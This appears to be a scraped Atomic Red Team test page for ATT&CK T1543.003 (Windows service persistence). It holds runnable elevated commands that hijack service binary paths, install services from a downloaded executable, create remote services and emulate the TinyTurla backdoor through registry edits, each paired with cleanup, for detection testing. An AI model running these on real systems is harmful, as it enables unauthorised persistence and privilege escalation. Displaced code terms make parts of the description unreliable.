T1543.003
Create or Modify System Process: Windows Service
Description from ATT&CK
Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API.
Adversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex:
) to disk, the payload can be loaded and registered via Native API functions such as 1
.sys
(or manually via functions such as 1
CreateServiceW()
and 1
ZwLoadDriver()
), by creating the required service Registry values (i.e. Modify Registry), or by using command-line utilities such as 1
ZwSetValueKey()
.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Unit42 AcidBox June 2020) Adversaries may leverage these drivers as Rootkits to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as "Bring Your Own Vulnerable Driver" (BYOVD)) as part of Exploitation for Privilege Escalation.(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020)1
PnPUtil.exe
Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through Service Execution.
To make detection analysis more challenging, malicious services may also incorporate Masquerade Task or Service (ex: using a service and/or payload name related to a legitimate OS or benign software component). Adversaries may also create ‘hidden’ services (i.e., Hide Artifacts), for example by using the
command to set service permissions via the Service Descriptor Definition Language (SDDL). This may hide a Windows service from the view of standard service enumeration methods such as 1
sc sdset
, 1
Get-Service
, and 1
sc query
.(Citation: SANS 1)(Citation: SANS 2)1
services.exe
Atomic Tests
Atomic Test #1 - Modify Fax service to run PowerShell
This test will temporarily modify the service Fax by changing the binPath to PowerShell
and will then revert the binPath change, restoring Fax to its original state.
Upon successful execution, cmd will modify the binpath for
to spawn powershell. Powershell will then spawn.1
Fax
Supported Platforms: windows
auto_generated_guid: ed366cde-7d12-49df-a833-671904770b9f
Inputs:
None
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
1
2
sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1543.003 Test'\""
sc start Fax
Cleanup Commands:
1
sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" >nul 2>&1
Atomic Test #2 - Service Installation CMD
Download an executable from github and start it as a service.
Upon successful execution, powershell will download
from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout.1
AtomicService.exe
Supported Platforms: windows
auto_generated_guid: 981e2942-e433-44e9-afc1-8c957a1496b6
Inputs:
Name | Description | Type | Default Value | |||||||
---|---|---|---|---|---|---|---|---|---|---|
binary_path | Name of the service binary, include path. | path | PathToAtomicsFolder\T1543.003\bin\AtomicService.exe | |||||||
service_type | Type of service. May be own | share | interact | kernel | filesys | rec | userown | usershare | string | Own |
startup_type | Service start method. May be boot | system | auto | demand | disabled | delayed-auto | string | auto | ||
service_name | Name of the Service | string | AtomicTestService_CMD |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
1
2
sc.exe create #{service_name} binPath= "#{binary_path}" start=#{startup_type} type=#{service_type}
sc.exe start #{service_name}
Cleanup Commands:
1
2
sc.exe stop #{service_name} >nul 2>&1
sc.exe delete #{service_name} >nul 2>&1
Dependencies: Run with powershell!
Description: Service binary must exist on disk at specified location (#{binary_path})
Check Prereq Commands:
1
if (Test-Path "#{binary_path}") {exit 0} else {exit 1}
Get Prereq Commands:
1
2
New-Item -Type Directory (split-path "#{binary_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
Atomic Test #3 - Service Installation PowerShell
Installs A Local Service via PowerShell.
Upon successful execution, powershell will download
from github. Powershell will then use 1
AtomicService.exe
and 1
New-Service
to start service. Results will be displayed.1
Start-Service
Supported Platforms: windows
auto_generated_guid: 491a4af6-a521-4b74-b23b-f7b3f1ee9e77
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
binary_path | Name of the service binary, include path. | path | PathToAtomicsFolder\T1543.003\bin\AtomicService.exe |
service_name | Name of the Service | string | AtomicTestService_PowerShell |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}"
Start-Service -Name "#{service_name}"
Cleanup Commands:
1
2
3
Stop-Service -Name "#{service_name}" 2>&1 | Out-Null
try {(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()}
catch {}
Dependencies: Run with powershell!
Description: Service binary must exist on disk at specified location (#{binary_path})
Check Prereq Commands:
1
if (Test-Path "#{binary_path}") {exit 0} else {exit 1}
Get Prereq Commands:
1
2
New-Item -Type Directory (split-path "#{binary_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
Atomic Test #4 - TinyTurla backdoor service w64time
It's running Dll as service to emulate the TinyTurla backdoor
Supported Platforms: windows
auto_generated_guid: ef0581fd-528e-4662-87bc-4c2affb86940
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
dllfilename | It specifies Dll file to run as service | string | $PathToAtomicsFolder\T1543.003\bin\w64time.dll |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
1
2
3
4
5
6
7
copy "#{dllfilename}" %systemroot%\system32\
sc create W64Time binPath= "c:\Windows\System32\svchost.exe -k TimeService" type= share start=auto
sc config W64Time DisplayName= "Windows 64 Time"
sc description W64Time "Maintain date and time synch on all clients and services in the network"
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /t REG_MULTI_SZ /d "W64Time" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%systemroot%\system32\w64time.dll" /f
sc start W64Time
Cleanup Commands:
1
2
3
4
5
sc stop W64Time
sc.exe delete W64Time
del %systemroot%\system32\w64time.dll
reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /f
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /f
Atomic Test #5 - Remote Service Installation CMD
Download an executable from github and start it as a service on a remote endpoint
Upon successful execution, powershell will download
from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout.1
AtomicService.exe
Supported Platforms: windows
auto_generated_guid: fb4151a2-db33-4f8c-b7f8-78ea8790f961
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
binary_path | Name of the service binary, include path. | path | PathToAtomicsFolder\T1543.003\bin\AtomicService.exe |
service_type | Type of service. May be own,share,interact,kernel,filesys,rec,userown,usershare | string | Own |
startup_type | Service start method. May be boot,system,auto,demand,disabled,delayed-auto | string | auto |
service_name | Name of the Service | string | AtomicTestService_CMD |
remote_host | Name of the remote endpoint | string | localhost |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
1
2
sc.exe \\#{remote_host} create #{service_name} binPath= "#{binary_path}" start=#{startup_type} type=#{service_type}
sc.exe \\#{remote_host} start #{service_name}
Cleanup Commands:
1
2
sc.exe \\#{remote_host} stop #{service_name} >nul 2>&1
sc.exe \\#{remote_host} delete #{service_name} >nul 2>&1
Dependencies: Run with powershell!
Description: Service binary must exist on disk at specified location (#{binary_path})
Check Prereq Commands:
1
if (Test-Path "#{binary_path}") {exit 0} else {exit 1}
Get Prereq Commands:
1
2
New-Item -Type Directory (split-path "#{binary_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
Atomic Test #6 - Modify Service to Run Arbitrary Binary (Powershell)
This test will use PowerShell to temporarily modify a service to run an arbitrary executable by changing its binary path and will then revert the binary path change, restoring the service to its original state. This technique was previously observed through SnapMC's use of Powerspolit's invoke-serviceabuse function. Reference
Supported Platforms: windows
auto_generated_guid: 1f896ce4-8070-4959-8a25-2658856a70c9
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
service_name | Name of the service to modify | string | fax |
new_bin_path | Path of the new service binary | String | $env:windir\system32\notepad.exe |
original_bin_path | Path of the original service binary | String | $env:windir\system32\fxssvc.exe |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
3
Stop-Service -Name "#{service_name}" -force -erroraction silentlycontinue | Out-Null
set-servicebinarypath -name "#{service_name}" -path "#{new_bin_path}"
start-service -Name "#{service_name}" -erroraction silentlycontinue | out-null
Cleanup Commands:
1
2
Stop-Service -Name "#{service_name}" -force -erroraction silentlycontinue | Out-Null
set-servicebinarypath -name "#{service_name}" -path "#{original_bin_path}" -erroraction silentlycontinue | out-null